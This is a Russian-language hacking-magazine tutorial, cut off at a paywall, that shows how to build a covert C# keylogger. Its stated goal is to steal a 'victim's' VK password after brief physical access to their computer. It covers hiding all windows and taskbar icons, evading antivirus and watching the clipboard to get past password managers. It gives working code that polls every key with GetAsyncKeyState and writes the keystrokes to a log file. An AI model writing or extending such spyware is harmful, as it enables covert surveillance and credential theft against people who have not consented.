Боевые кейлоггеры с кучей функций и защитой от детекта могут стоить десятки, если не сотни долларов. Но кейлоггер не такая уж сложная штука, и при желании ты можешь сделать собственный и даже избежать детекта антивирусами. В этой статье я покажу, как это делается, а заодно поупражняемся в разработке программ на C#.
 

Ставим задачу

Мудрить не будем и ограничимся необходимым минимумом. Предположим, мы хотим заполучить пароль жертвы от ВК и мы можем ненадолго получить физический доступ к компьютеру. При этом:

  • мы не беспокоим жертву лишними окнами, иконками в таскбаре, сообщениями об ошибках и подобным;
  • мы имеем доступ к целевому компьютеру только однократно и на очень короткий срок;
  • мы сможем забирать логи, находясь в той же локальной сети;
  • антивирус должен молчать;
  • файрвол не учитываем и предполагаем, что мы дадим ему разрешение вручную при подсадке кейлоггера;
  • мы не будем пытаться скрывать процесс и только дадим ему неприметное название.

Еще жертва может пользоваться парольным менеджером, тогда в логе мы получим только Ctrl-C и Ctrl-V. На этот случай будем мониторить еще и содержимое буфера обмена.

INFO

Подробнее об атаках на парольные менеджеры читай в статье «Ищем слабые места современных менеджеров паролей».

Писать будем на C# в Visual Studio. Забегая вперед, скажу, что в результате у меня получилось две версии программы — одна работает через перехват WinAPI, другую я про себя называю «костыльной». Но эта менее красивая версия дает другие результаты при проверке антивирусами, поэтому расскажу и о ней.

 

Теория

Когда ты нажимаешь на кнопку, операционка посылает уведомления тем программам, которые хотят об этом узнать. Поэтому самый простой способ перехватить ввод с клавиатуры — это принимать сообщения о нажатиях клавиш. Если мы этого сделать не можем (например, функция SetWindowsHookEx запрещена антивирусом или еще чем-либо), можно тянуть сырой ввод и без нее. Есть такая функция — GetAsyncKeyState, которая принимает номер клавиши и позволяет узнать, зажата она или отжата в момент вызова. Собственно, алгоритм действий будет такой: раз в N мс опрашиваем все кнопки и узнаем их состояние, занося нажатые в специальный список. Затем список обрабатываем, учитывая состояние клавиши Caps Lock, Num Lock, Shift, Ctrl и так далее. Полученные данные будем записывать в файл.

 

Пишем код

Для начала откроем Visual Studio и создадим новый проект Windows Forms (.NET Framework). Почему именно Windows Forms? Если мы выберем обычное консольное приложение, то при каждом запуске будет создаваться некрасивое черное окошко, а ведь юзера мы договорились не беспокоить. Также, пока мы не создали форму (а создавать ее мы и не будем), никаких значков в таскбаре не появится — важная часть скрытой работы. Теперь удаляй автоматически созданный файл Form1.cs со всеми потрохами и открывай Program.cs.

Заглушка Main
Заглушка Main

Здесь нас уже поджидает шаблон программы, но он не будет работать просто так. Первым делом надо убрать строчки 10–12 и 16–18. Теперь меняем объявление метода со static void Main() на static void Main(String[] args). Нужно это для того, чтобы мы могли определить свои аргументы при перезапуске.

Теперь добавим using System.IO; для работы с файлами, System.Runtime.InteropServices для работы с WinAPI и System.Threading для приостановки потока. Если ты не хочешь писать костыльный вариант, лучше пропусти этот раздел и сразу переходи к следующему.

Импортируем GetAsyncKeyState из user32.dll:

[DllImport("user32.dll")]
public static extern int GetAsyncKeyState(Int32 i);

И добавляем собственно логирование нажатий, собирая их по десять штук, чтобы не делать слишком много дисковых операций:

while (true)
{
   Thread.Sleep(100);
   for (int i = 0; i < 255; i++)
   {
      int state = GetAsyncKeyState(i);
      if (state != 0)
      {
        buf += ((Keys)i).ToString(); 
        if (buf.Length > 10) 
        {
           File.AppendAllText("keylogger.log", buf); 
           buf = ""; 
        }
      }
   }
}
Расшифровывать такой лог будет неудобно
Расшифровывать такой лог будет неудобно

Выглядит не очень красиво, а про читабельность вообще можно забыть. Во-первых, наш код тянет ввод не только с клавиатуры, но и с мыши (всякие LButton и RButton). Поэтому давай не будем записывать нажатие, если это не символьная клавиша. Заменим содержимое if в цикле на это:

// Усовершенствованная проверка введенных символов //
if (((Keys)i) == Keys.Space) { buf += " "; continue; }
if (((Keys)i) == Keys.Enter) { buf += "\r\n"; continue; }
if (((Keys)i) == Keys.LButton ||((Keys)i) == Keys.RButton ||((Keys)i) == Keys.MButton) continue;
if (((Keys)i).ToString().Length == 1)
{
     buf += ((Keys)i).ToString();
}
else
{
     buf += $"<{((Keys)i).ToString()}>";
}
if (buf.Length > 10)
{     File.AppendAllText("keylogger.log", buf);
     buf = "";
}

После такого редактирования лог стал намного чище (см. рисунок).

Продолжение доступно только участникам

Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

Вариант 2. Открой один материал

Заинтересовала статья, но нет возможности стать членом клуба «Xakep.ru»? Тогда этот вариант для тебя! Обрати внимание: этот способ подходит только для статей, опубликованных более двух месяцев назад.


  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    7 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии